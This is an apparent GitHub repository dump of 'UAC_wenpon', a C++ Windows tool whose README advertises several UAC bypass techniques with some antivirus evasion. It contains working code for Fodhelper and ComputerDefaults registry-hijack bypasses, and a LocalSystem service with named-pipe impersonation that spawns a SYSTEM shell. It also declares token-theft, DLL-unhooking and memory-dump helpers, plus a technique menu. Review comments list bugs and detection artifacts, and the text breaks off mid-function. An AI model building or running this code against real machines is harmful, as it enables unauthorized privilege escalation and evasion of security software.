├── cmstp.cpp ├── stdafx.h ├── display.png ├── targetver.h ├── Fodhelper.h ├── WSReset.h ├── README.md ├── IIEAdmin.h ├── Security Center.h ├── ComputerDefaults.h ├── Cmstp.h ├── priv.h ├── ComputerDefaults.cpp ├── Fodhelper.cpp ├── TokenSteal.h ├── UAC_wenpon.sln ├── UAC_wenpon.cpp ├── .gitattributes ├── UAC_wenpon.vcxproj.filters ├── priv.cpp ├── WSReset.cpp ├── TokenSteal.cpp ├── .gitignore ├── UAC_wenpon.vcxproj ├── Security Center.cpp └── IIEAdmin.cpp /cmstp.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/cmstp.cpp -------------------------------------------------------------------------------- /stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/stdafx.h -------------------------------------------------------------------------------- /display.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/display.png -------------------------------------------------------------------------------- /targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scareing/UAC_wenpon/HEAD/targetver.h -------------------------------------------------------------------------------- /Fodhelper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | int Fodhelper(char* arg); -------------------------------------------------------------------------------- /WSReset.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int WSReset(char* arg); -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | # UAC_wenpon 2 | UAC_wenpon 3 | 4 | > 包含常用的几种UAC bypass技术,win7-win10 ,同时拥有一定的bypass 杀软的能力。 5 | 6 | ![RUNOOB 图标](https://github.com/scareing/UAC_wenpon/blob/91d5935c461ddab0ab26ca6d09e292639ec6da0a/display.png) 7 | 8 | -------------------------------------------------------------------------------- /IIEAdmin.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int IIEAdmin(char* arg); -------------------------------------------------------------------------------- /Security Center.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | //#pragma comment(lib,"comsuppw.lib") 10 | 11 | int Security_Center(char* arg); -------------------------------------------------------------------------------- /ComputerDefaults.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | //#pragma comment(lib,"Advapi32.lib") 6 | //#pragma comment(lib,"Shell32.lib") 7 | //#pragma comment(lib,"User32.lib") 8 | //#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") 9 | 10 | int ComputerDefaults(char* arg); -------------------------------------------------------------------------------- /Cmstp.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "stdafx.h" 4 | #include 5 | #include "windows.h" 6 | #include "winternl.h" 7 | #include 8 | #include "priv.h" 9 | #include 10 | #include 11 | 12 | #pragma comment(lib,"Advapi32.lib") 13 | #pragma comment(lib,"Shell32.lib") 14 | #pragma comment(lib,"Ole32.lib") 15 | 16 | using namespace std; 17 | 18 | 19 | int Cmstp(char* arg, char* 
arg2); -------------------------------------------------------------------------------- /priv.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef PRIV_AAAAAAAAAAAAA 4 | #define PRIV_AAAAAAAAAAAAA 5 | 6 | 7 | #include "windows.h" 8 | /* Helpers implemented in priv.cpp: create/start/delete the "tencent_temp" service, named-pipe client impersonation, and duplication / privilege adjustment of the impersonated token. */ 9 | 10 | VOID fn_start_service(); 11 | VOID fn_delete_service(); 12 | INT fn_create_service(); 13 | INT fn_create_process(LPWSTR lpFileName, LPCWSTR lpParam); /* NOTE(review): lpFileName is appended to in place (lstrcat " " + lpParam), so the caller's buffer must have room for that; nothing checks it */ 14 | HANDLE fn_backup_token(); 15 | VOID fn_adjust_token_privilege(HANDLE& hNewThreadToken); 16 | INT fn_impersonate_via_namepipe(); 17 | 18 | /* NOTE(review): the next line has "#pragma once" glued onto the "#endif" directive; compilers warn about extra tokens after #endif, and the file already has #pragma once at line 1, so the trailing one should simply be removed */ 19 | #endif#pragma once 20 | -------------------------------------------------------------------------------- /ComputerDefaults.cpp: -------------------------------------------------------------------------------- 1 | #include "ComputerDefaults.h" /* ComputerDefaults(arg): UAC bypass through the auto-elevating ComputerDefaults.exe. Creates a per-user ProgID ".pwn" whose shell\open\command is `arg`, points HKCU\Software\Classes\ms-settings\CurVer at it, launches ComputerDefaults.exe (which opens the ms-settings handler and, via the CurVer redirect, is expected to run `arg` elevated), then deletes both keys. Identical registry layout to Fodhelper(). Returns 0 unconditionally; no API result is checked. Detection artifacts: HKCU\Software\Classes\ms-settings\CurVer and HKCU\Software\Classes\.pwn created and deleted within ~1s of a ComputerDefaults.exe start. */ 2 | int ComputerDefaults(char* arg) 3 | { 4 | 5 | PROCESS_INFORMATION pi = { 0 }; 6 | STARTUPINFOA si = { 0 }; 7 | HKEY hKey; 8 | HKEY hKey2; 9 | char* secret = arg; /* command line the elevated handler will execute */ 10 | 11 | si.cb = sizeof(STARTUPINFO); 12 | si.wShowWindow = SW_HIDE; /* NOTE(review): si and pi are never passed to any API in this function (ShellExecuteA is used below), so these fields are dead */ 13 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn\\Shell\\Open\\command", &hKey); 14 | RegSetValueExA(hKey, "", 0, REG_SZ, (LPBYTE)secret, strlen(secret)); /* NOTE(review): a REG_SZ size should include the terminating NUL (strlen+1); return values are unchecked and hKey/hKey2 are never RegCloseKey'd */ 15 | RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (LPBYTE)"", sizeof("")); /* empty DelegateExecute is part of the published technique — presumably so the shell uses the command string instead of a COM handler; not verified here */ 16 | 17 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\CurVer", &hKey2); 18 | RegSetValueExA(hKey2, "", 0, REG_SZ, (LPBYTE)".pwn", strlen(".pwn")); 19 | ShellExecuteA(NULL, "open", (LPCSTR)"C:\\Windows\\System32\\ComputerDefaults.exe", NULL, NULL, SW_SHOW); /* hard-coded system drive; a failure here is not reported */ 20 | Sleep(1000); /* NOTE(review): fixed 1s race — if the handler has not read the keys yet the cleanup below removes them first; conversely the keys stay visible to monitoring for the whole second */ 21 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings"); 22 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn"); 23 | 24 | return 0; 25 | } -------------------------------------------------------------------------------- /Fodhelper.cpp: -------------------------------------------------------------------------------- 1 | #include 
"Fodhelper.h" 2 | 3 | int Fodhelper(char* arg) { 4 | 5 | PROCESS_INFORMATION pi = { 0 }; 6 | STARTUPINFOA si = { 0 }; 7 | HKEY hKey; 8 | HKEY hKey2; 9 | char* secret = arg; 10 | 11 | 12 | 13 | si.cb = sizeof(STARTUPINFO); 14 | si.wShowWindow = SW_HIDE; 15 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn\\Shell\\Open\\command", &hKey); 16 | RegSetValueExA(hKey, "", 0, REG_SZ, (LPBYTE)secret, strlen(secret)); 17 | RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (LPBYTE)"", sizeof("")); 18 | 19 | RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\CurVer", &hKey2); 20 | RegSetValueExA(hKey2, "", 0, REG_SZ, (LPBYTE)".pwn", strlen(".pwn")); 21 | 22 | CreateProcessA("C:\\Windows\\System32\\cmd.exe", (LPSTR)"/c C:\\Windows\\System32\\fodhelper.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &si, &pi); 23 | Sleep(1000); 24 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings"); 25 | RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\.pwn"); 26 | return 0; 27 | } -------------------------------------------------------------------------------- /TokenSteal.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | void Error( 14 | _In_ DWORD lastError 15 | ); 16 | 17 | DWORD FindPid( 18 | _In_ std::wstring imageName 19 | ); 20 | 21 | BOOL SetPrivilege( 22 | _In_ HANDLE hToken, // access token handle 23 | _In_ LPCTSTR lpszPrivilege, // name of privilege to enable/disable 24 | _In_ BOOL bEnablePrivilege // to enable or disable privilege 25 | ); 26 | 27 | bool UnhookDll( 28 | _In_ std::string dllPath 29 | ); 30 | 31 | typedef BOOL(WINAPI* pMiniDumpWriteDump) 32 | ( 33 | HANDLE hProcess, 34 | DWORD ProcessId, 35 | HANDLE hFile, 36 | MINIDUMP_TYPE DumpType, 37 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, 38 | 
PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, 39 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam 40 | ); 41 | 42 | 43 | namespace RAII 44 | { 45 | class Handle 46 | { 47 | public: 48 | Handle(HANDLE inputHandle); 49 | ~Handle(); 50 | HANDLE GetHandle(); 51 | 52 | private: 53 | HANDLE _internalHandle; 54 | }; 55 | 56 | class Hmodule 57 | { 58 | public: 59 | Hmodule(HMODULE inputHmodule); 60 | ~Hmodule(); 61 | HMODULE GetHmodule(); 62 | 63 | private: 64 | HMODULE _internalHmodule; 65 | }; 66 | }; 67 | 68 | 69 | int TokenSteal(char* arg, char* arg2); -------------------------------------------------------------------------------- /UAC_wenpon.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31424.327 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UAC_wenpon", "UAC_wenpon.vcxproj", "{98546E43-50E2-400B-B7DC-215205D045E7}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x64.ActiveCfg = Debug|x64 17 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x64.Build.0 = Debug|x64 18 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x86.ActiveCfg = Debug|Win32 19 | {98546E43-50E2-400B-B7DC-215205D045E7}.Debug|x86.Build.0 = Debug|Win32 20 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x64.ActiveCfg = Release|x64 21 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x64.Build.0 = Release|x64 22 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x86.ActiveCfg = Release|Win32 23 | {98546E43-50E2-400B-B7DC-215205D045E7}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | 
GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {D6ABA1AF-B734-43AF-B85A-3A70BBF67A1D} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /UAC_wenpon.cpp: -------------------------------------------------------------------------------- 1 | // UAC_wenpon.cpp : This file contains the "main" function. Program execution begins and ends here. 2 | // 3 | 4 | #include "ComputerDefaults.h" 5 | #include "Fodhelper.h" 6 | #include "Cmstp.h" 7 | #include "IIEAdmin.h" 8 | #include "Security Center.h" 9 | #include "WSReset.h" 10 | #include "TokenSteal.h" 11 | 12 | 13 | /* Prints the technique menu in red, then leaves the console attribute set to BACKGROUND_BLUE; the original attribute is never restored. */ 14 | 15 | void usage() { 16 | HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE), hHijackEvent = NULL, hDeleteEvent = NULL; /* hHijackEvent and hDeleteEvent are unused */ 17 | SetConsoleTextAttribute(hConsole, FOREGROUND_RED); 18 | printf("\n BypassUac by Scareing \n"); 19 | printf("\n uac.exe id calc or uac.exe id cmd \"/c calc\" \n"); 20 | printf("\n ID 1: Fodhelper \n"); 21 | printf("\n ID 2: ComputerDefaults \n"); 22 | printf("\n ID 3: Cmstp \n"); 23 | printf("\n ID 4: IIEObject \n"); 24 | printf("\n ID 5: Security_Center \n"); 25 | printf("\n ID 6: WSReset \n"); 26 | printf("\n ID 7: TokenSteal \n"); 27 | SetConsoleTextAttribute(hConsole, BACKGROUND_BLUE); 28 | 29 | } 30 | /* Entry point: uac.exe <id> <program> [<arguments>]. argv[1] selects the technique (1-7), argv[2] is the program/command string handed to it; ids 3 and 7 additionally use argv[3]. Returns -1 on a usage error, otherwise 0 whether or not the technique worked — every technique's return value is discarded. */ 31 | int main(int argc, char** argv) 32 | { 33 | 34 | 35 | 36 | if (argc < 3) 37 | { 38 | //PRINT_USAGE(); 39 | usage(); 40 | return -1; 41 | } 42 | 43 | int choose = atoi(argv[1]); /* atoi yields 0 for non-numeric input, which matches no case below */ 44 | char* arge = argv[2]; 45 | 46 | switch (choose) { 47 | case 1: { 48 | Fodhelper(arge); 49 | break; 50 | } 51 | case 2: { 52 | ComputerDefaults(arge); 53 | break; 54 | } 55 | case 3: { 56 | if (argc < 4) 57 | { 58 | //PRINT_USAGE(); 59 | printf("\n uac.exe number cmd \"/c calc\" \n"); 60 | //usage(); 61 | return -1; 62 | } 63 | char* arge2 = argv[3]; 64 | Cmstp(arge, arge2); 65 | break; 66 | } 67 | case 4: { 68 | IIEAdmin(arge); 69 | break; 70 | } 71 | 
case 5: { 72 | Security_Center(arge); 73 | break; 74 | } 75 | case 6: { 76 | WSReset(arge); 77 | break; 78 | } 79 | case 7: { 80 | /* NOTE(review): unlike case 3 there is no argc < 4 guard; with only three arguments argv[3] is argv's terminating null pointer, so TokenSteal receives a null arg2 */ 81 | char* arge2 = argv[3]; 82 | TokenSteal(arge, arge2); 83 | break; 84 | } 85 | } /* no default: an unknown id does nothing and main returns 0 */ 86 | 87 | } 88 | 89 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. 
To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 
53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /UAC_wenpon.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | 头文件 23 | 24 | 25 | 源文件 26 | 27 | 28 | 源文件 29 | 30 | 31 | 源文件 32 | 33 | 34 | 源文件 35 | 36 | 37 | 源文件 38 | 39 | 40 | 源文件 41 | 42 | 43 | 源文件 44 | 45 | 46 | 源文件 47 | 48 | 49 | 50 | 51 | 头文件 52 | 53 | 54 | 头文件 55 | 56 | 57 | 头文件 58 | 59 | 60 | 头文件 61 | 62 | 63 | 头文件 64 | 65 | 66 | 头文件 67 | 68 | 69 | 头文件 70 | 71 | 72 | 头文件 73 | 74 | 75 | 头文件 76 | 77 | 78 | -------------------------------------------------------------------------------- /priv.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include "priv.h" 3 | 4 | 5 | 6 | INT fn_create_process(LPWSTR lpFileName, LPCWSTR lpParam) { 7 | 8 | lstrcat(lpFileName, (LPCWSTR)" "); 9 | lstrcat(lpFileName, lpParam); 10 | 11 | STARTUPINFO si; 12 | PROCESS_INFORMATION pi; 13 | 14 | ZeroMemory(&si, sizeof(si)); 15 | ZeroMemory(&pi, sizeof(pi)); 16 | 17 | 18 | si.cb = sizeof(si); 19 | si.wShowWindow = SW_HIDE; 20 | si.dwFlags = STARTF_USESHOWWINDOW; 21 | CreateProcess(NULL, lpFileName, NULL, NULL, 0, 
CREATE_NO_WINDOW, NULL, NULL, &si, &pi); /* NOTE(review): the CreateProcess result is unchecked, so on failure the CloseHandle calls below run on the zeroed (NULL) handles */ 22 | 23 | WaitForSingleObject(pi.hProcess, 0); /* NOTE(review): zero timeout — this does not wait for the child, yet fn_delete_service relies on its two commands running in order */ 24 | CloseHandle(pi.hProcess); 25 | CloseHandle(pi.hThread); 26 | 27 | return TRUE; /* always TRUE; there is no failure path. Also note the `(LPCWSTR)" "` at the top of this function casts a 2-byte narrow literal to a wide string, so lstrcat reads past the literal until it happens to hit a wide NUL */ 28 | 29 | } 30 | 31 | /* Runs "<system dir>\cmd.exe /c net start tencent_temp" through fn_create_process. The MAX_PATH WCHAR buffer is heap-allocated and never freed. */ 32 | 33 | 34 | 35 | VOID fn_start_service() { 36 | 37 | LPWSTR lpCmdPath = new WCHAR[MAX_PATH]; 38 | GetSystemDirectory(lpCmdPath, MAX_PATH); 39 | lstrcat(lpCmdPath, L"\\cmd.exe /c"); 40 | fn_create_process(lpCmdPath, L"net start tencent_temp"); 41 | 42 | } 43 | /* Stops and deletes the tencent_temp service via net/sc. NOTE(review): fn_create_process appends its parameter into lpCmdPath, so after the first call the buffer already ends in "net stop tencent_temp"; the second call therefore runs "cmd.exe /c net stop tencent_temp sc delete tencent_temp" — one command with extra tokens — instead of "sc delete tencent_temp", and the auto-start service is probably left on the box. Use a fresh buffer (or a copy) per call. The buffer is also never freed. */ 44 | 45 | VOID fn_delete_service() { 46 | 47 | LPWSTR lpCmdPath = new WCHAR[MAX_PATH]; 48 | GetSystemDirectory(lpCmdPath, MAX_PATH); 49 | lstrcat(lpCmdPath, L"\\cmd.exe /c"); 50 | fn_create_process(lpCmdPath, L"net stop tencent_temp"); 51 | fn_create_process(lpCmdPath, L"sc delete tencent_temp"); 52 | 53 | } 54 | /* Duplicates the calling thread's (impersonation) token into a primary token at SecurityDelegation level. Returns the new primary token, or NULL (FALSE) if OpenThreadToken or DuplicateTokenEx fails. NOTE(review): on the DuplicateTokenEx failure path hThreadToken is leaked. */ 55 | 56 | 57 | 58 | HANDLE fn_backup_token() { 59 | 60 | HANDLE hThreadToken = NULL; 61 | HANDLE hNewThreadToken = NULL; 62 | 63 | if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hThreadToken)) { 64 | return FALSE; 65 | } 66 | if (!DuplicateTokenEx(hThreadToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hNewThreadToken)) { 67 | return FALSE; 68 | } 69 | 70 | CloseHandle(hThreadToken); 71 | return hNewThreadToken; 72 | 73 | } 74 | /* Enables SeIncreaseQuotaPrivilege and SeAssignPrimaryTokenPrivilege on hNewThreadToken for the CreateProcessAsUser fallback. NOTE(review): TOKEN_PRIVILEGES only has room for a single LUID_AND_ATTRIBUTES, so the write to Privileges[1] below overruns the stack object; the commented-out 2*sizeof heap allocation is the shape that was needed (together with passing the real size). LookupPrivilegeValue/AdjustTokenPrivileges results are unchecked. */ 75 | 76 | VOID fn_adjust_token_privilege(HANDLE& hNewThreadToken) { 77 | 78 | TOKEN_PRIVILEGES tp = { 0 }; 79 | //TOKEN_PRIVILEGES *tp = (TOKEN_PRIVILEGES*)new unsigned char[sizeof(TOKEN_PRIVILEGES) * 2]; 80 | LUID lUID, lUID2; 81 | ZeroMemory(&tp, sizeof(tp)); 82 | LookupPrivilegeValue(NULL, L"SeIncreaseQuotaPrivilege", &lUID); 83 | LookupPrivilegeValue(NULL, L"SeAssignPrimaryTokenPrivilege", &lUID2); 84 | 85 | tp.PrivilegeCount = 2; 86 | tp.Privileges[0].Luid = lUID; 87 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 88 | tp.Privileges[1].Luid = lUID2; 89 | tp.Privileges[1].Attributes = SE_PRIVILEGE_ENABLED; 90 | 91 | //tp->PrivilegeCount = 2; 92 | //tp->Privileges[0].Luid = lUID; 93 | //tp->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
94 | //tp->Privileges[1].Luid = lUID2; 95 | //tp->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED; 96 | 97 | AdjustTokenPrivileges(hNewThreadToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); /* buffer length passed is sizeof(TOKEN_PRIVILEGES) even though PrivilegeCount claims 2 */ 98 | //AdjustTokenPrivileges(hNewThreadToken, FALSE, tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); 99 | } 100 | /* Named-pipe impersonation. Creates \\.\pipe\rabbit, starts the tencent_temp service (whose binary path, see fn_create_service, echoes into that pipe; no account is given at CreateService so it runs as LocalSystem), impersonates the connecting client, converts the token to a primary token and spawns cmd.exe with it. Returns FALSE only if ImpersonateNamedPipeClient fails; TRUE otherwise, including when the pipe or the process creation failed. Detection artifacts: the pipe name, the service name, and "net start tencent_temp" spawned from cmd.exe. NOTE(review): the loop condition only checks CreateNamedPipe's result, so on failure the loop is skipped and ReadFile/ImpersonateNamedPipeClient run on INVALID_HANDLE_VALUE; a ConnectNamedPipe that returns FALSE with ERROR_PIPE_CONNECTED (client already attached) may be treated as failure and start the service again; the pipe is created with NULL security attributes (default DACL) — presumably any local client can connect, so a non-SYSTEM client that wins the race would be the one impersonated; lpReadBuffer is never freed and on the FALSE path hNamePipe is leaked. */ 101 | 102 | 103 | INT fn_impersonate_via_namepipe() { 104 | 105 | 106 | LPSTR lpReadBuffer = new CHAR[MAX_PATH]; 107 | DWORD dwRealReadLen = 0; 108 | // ReadFile param 109 | 110 | STARTUPINFO si; 111 | PROCESS_INFORMATION pi; 112 | ZeroMemory(&si, sizeof(si)); 113 | ZeroMemory(&pi, sizeof(pi)); 114 | si.cb = sizeof(si); 115 | //si.wShowWindow = SW_HIDE; 116 | //si.dwFlags = STARTF_USESHOWWINDOW; 117 | //CreateProcess param 118 | 119 | 120 | LPCWSTR lpNamePipe = L"\\\\.\\pipe\\rabbit"; 121 | HANDLE hNamePipe = CreateNamedPipe(lpNamePipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL); 122 | 123 | while (hNamePipe != INVALID_HANDLE_VALUE) { 124 | /* each iteration re-runs "net start tencent_temp" until a client connects */ 125 | fn_start_service(); 126 | if (ConnectNamedPipe(hNamePipe, NULL) != FALSE) { 127 | break; 128 | } 129 | } 130 | 131 | ReadFile(hNamePipe, lpReadBuffer, MAX_PATH, &dwRealReadLen, NULL); // must read byte from namepipe handle before impersonate 132 | if (!ImpersonateNamedPipeClient(hNamePipe)) { 133 | return FALSE; 134 | } 135 | 136 | // convert the impersonation token now on this thread into a primary token usable for process creation 137 | HANDLE hNewThreadToken = fn_backup_token(); 138 | if (hNewThreadToken != FALSE) { 139 | BOOL bRet = CreateProcessWithTokenW(hNewThreadToken, LOGON_NETCREDENTIALS_ONLY, NULL, (LPWSTR)L"cmd.exe", NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi); 140 | // CreateProcessWithTokenW is tried first; if it fails, enable the privileges CreateProcessAsUser needs on the token and fall back to it. 
141 | if (!bRet) { 142 | fn_adjust_token_privilege(hNewThreadToken); 143 | CreateProcessAsUser(hNewThreadToken, NULL, (LPWSTR)L"cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); /* NOTE(review): bInheritHandles is TRUE here; neither call's result is checked and pi.hProcess/pi.hThread are never closed */ 144 | } 145 | 146 | 147 | } 148 | 149 | CloseHandle(hNewThreadToken); /* also runs when fn_backup_token returned NULL */ 150 | RevertToSelf(); 151 | DisconnectNamedPipe(hNamePipe); 152 | CloseHandle(hNamePipe); 153 | return TRUE; 154 | 155 | } 156 | /* Creates the auto-start "tencent_temp" service whose binary path is "cmd.exe /c echo tencent > \\.\pipe\rabbit"; no service account is given, so it runs as LocalSystem and, when started, connects to the pipe served by fn_impersonate_via_namepipe. Returns TRUE on success, FALSE if OpenSCManager or CreateService fails. NOTE(review): SERVICE_AUTO_START means the entry persists across reboots unless fn_delete_service actually removes it (see the note there). */ 157 | 158 | 159 | 160 | 161 | INT fn_create_service() { 162 | 163 | // stop/delete of the service is done from the command line (net/sc) in fn_delete_service rather than through the SCM API; the author's stated reason is that those operations were not intercepted by anti-virus. 164 | SC_HANDLE hSCM = NULL; 165 | SC_HANDLE hService = NULL; 166 | LPCWSTR lpServiceName = L"tencent_temp"; 167 | LPCWSTR lpBinPath = L"c:\\windows\\system32\\cmd.exe /c echo tencent > \\\\.\\pipe\\rabbit"; 168 | 169 | hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); 170 | if (hSCM == NULL) 171 | return FALSE; 172 | 173 | 174 | hService = CreateService(hSCM, lpServiceName, lpServiceName, 175 | SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, 176 | lpBinPath, NULL, NULL, NULL, NULL, NULL); 177 | if (hService == NULL) { 178 | CloseServiceHandle(hSCM); 179 | return FALSE; 180 | } 181 | 182 | CloseServiceHandle(hService); 183 | CloseServiceHandle(hSCM); 184 | 185 | return TRUE; 186 | 187 | } 188 | 189 | 190 | 191 | -------------------------------------------------------------------------------- /WSReset.cpp: -------------------------------------------------------------------------------- 1 | #include "WSReset.h" 2 | 3 | using UserAssocSetPtr = void(WINAPI*)(int unknown0, PCWCHAR fileType, PCWCHAR progId); 4 | using UserAssocSetInternalPtr = HRESULT(WINAPI*)(void* unused0, PCWCHAR fileType, PCWCHAR progId, int unknown0); 5 | 6 | const BYTE SIGNATURE_NT10[] = { 7 | 0x48, 0x8B, 0xC4, 0x55, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0x68, 0xA1, 0x48, 0x81, 0xEC, 0xA0, 8 | 0x00, 0x00, 0x00, 0x48, 0xC7, 0x45, 0xEF, 0xFE, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x58, 0x08, 
0x48, 0x89, 0x70, 0x20 9 | }; 10 | 11 | const BYTE SIGNATURE_NT6X[] = { 12 | 0x48, 0x89, 0x5C, 0x24, 0x08, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0xFE, 0xFF, 13 | 0xFF, 0x48, 0x81, 0xEC, 0x80, 0x02, 0x00, 0x00 14 | }; 15 | 16 | template 17 | T LocateSignature(const BYTE signature[], const int signatureSize, const char* sectionName, const HMODULE moduleHandle) 18 | { 19 | auto* headers = reinterpret_cast(reinterpret_cast(moduleHandle) + reinterpret_cast< 20 | PIMAGE_DOS_HEADER>(moduleHandle)->e_lfanew); 21 | auto* sectionHeader = IMAGE_FIRST_SECTION(headers); 22 | 23 | while (std::strcmp(sectionName, reinterpret_cast(sectionHeader->Name)) != 0) 24 | sectionHeader++; 25 | 26 | for (auto* i = reinterpret_cast(moduleHandle) + sectionHeader->VirtualAddress; i != reinterpret_cast< 27 | PUCHAR>(moduleHandle) + sectionHeader->VirtualAddress + sectionHeader->SizeOfRawData - signatureSize; i++ 28 | ) 29 | { 30 | if (std::memcmp(signature, i, signatureSize) == 